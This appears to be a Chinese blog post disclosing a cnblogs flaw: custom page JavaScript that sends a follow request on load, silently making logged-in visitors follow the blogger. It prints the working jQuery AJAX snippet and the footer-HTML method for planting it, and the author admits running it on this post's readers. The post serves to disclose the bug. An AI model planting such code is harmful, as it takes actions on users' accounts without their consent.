發現一個騙粉絲的人後發現部落格園的一個bug
發現一個騙粉絲的人後發現部落格園的一個bug
當你點開這篇文章的時候,如果你已經登入部落格園賬號,那麼你自動回成為我的部落格園粉絲,因為我加了自動關注的js,這裡並不是想騙粉絲,希望部落格園能重視這個bug(當然部落格園肯定知道這個bug的)。明天早上我會刪除掉這段js的。
-
起因>發現一個騙粉絲的人
-
經過>他是如何實現騙粉絲的
-
我的一些思考
1.發現一個騙粉絲的人
今天下班,開啟部落格園的時候看到這篇文章,點了進去,感覺排版不錯,自定義的介面體驗非常不錯,職業性地點選了主頁看了看,發現了一個問題,於是乎有了這篇文章。
至於是什麼問題,還是看圖說話吧
這時我並沒有感覺到任何奇怪的地方,感覺體驗不錯,排版和內容也還不錯,我是搞.net 的,所以對於java只是粗略地看了一下,文章寫的還是可以的,於是我習慣性地點選了他的主頁,我發現我已經關注了他,對於java,很難有充分的理由讓我去關注他。那麼問題來了,“剛剛點選了那篇文章,是如何實現自動關注,騙粉絲的呢”!
其實也就是刷小聰明騙粉絲而已。
2.他是如何實現騙粉絲的
點選那篇文章,開啟F12,發現了兩段自定義的yueshutong.js和guanzhu.js,他申請了自定義的js的許可權,可以引入外部的js。第一段yueshutong.js 並沒有發現任何奇怪的地方。作為學生來說這段程式碼寫的還是可以的,100分的話我可以給80分。
至於第二段guanzhu.js 非常簡單直接,不過現在他已經刪除掉了,刷小聰明做賊心虛,不過我已經擷取下來了,沒圖說個jb啊!
連部落格園的站長都成了他的粉絲了,之前看的時候發現dudu都成了他的粉絲,不過現在dudu取關了,這騙真的是可以的,滿分!
就是這段guanzhu.js ,懂點js的都知道在網頁載入的時候自動傳送ajax請求關注,這個引數cb_blogUserGuid就是使用者的唯一標識,可以在每篇文章的左鍵檢視原始碼裡面找的到
$(document).ready(function(){
var json = {"blogUserGuid":cb_blogUserGuid};
$.ajax({
type: "POST",
url: "/mvc/Follow/FollowBlogger.aspx",
data: JSON.stringify(json),
contentType: "application/json; charset=utf-8",
dataType: "text",
success: function(data) {
//console.log("..")
}
});
})
為了驗證正確性,隨便開啟一篇文章就可以檢視“關注我”按鈕的js事件,
這個fllow方法在blog-common.js中
至於實現的方式,其實非常low,就是申請js許可權,在設定>頁尾html程式碼 新增這段js
“<script src="//files.cnblogs.com/files/zhangmumu/test.js/>”
在網頁載入的時候自動傳送關注的ajax請求。
3.我的看法
1. 從技術上來說,這並沒有任何難度,部落格園給我們開放js許可權,是讓更好自定義自己的部落格,當然部落格園肯定是知道這個bug的,而極少部分人卻拿這個去“騙粉絲”,也許是為了好玩而已。我還是希望部落格園能夠修復這個bug,畢竟這個bug實實在在地存在。
2. 從社群的環境來說,部落格園是最“純粹的社群”,可能沒有之一。
“是一個面向開發者的知識分享社群。自建立以來,部落格園一直致力並專注於為開發者打造一個純淨的技術交流社群,推動並幫助開發者通過網際網路分享知識,從而讓更多開發者從中受益。部落格園的使命是幫助開發者用程式碼改變世界”
搞.net的,有一些部落格園的粉絲,說明還是有一定的含金量的,是一個面向開發者的知識分享社群,,前段時間比較火的是github簡歷造假,給中國的github社群造成不少的影響,搞.net的,有一些部落格園的粉絲,說明還是有一定的含金量的。希望每個在部落格園的博主都成為這個為數不多的“乾淨”社群的維護者和參與者(有點拍馬屁了)。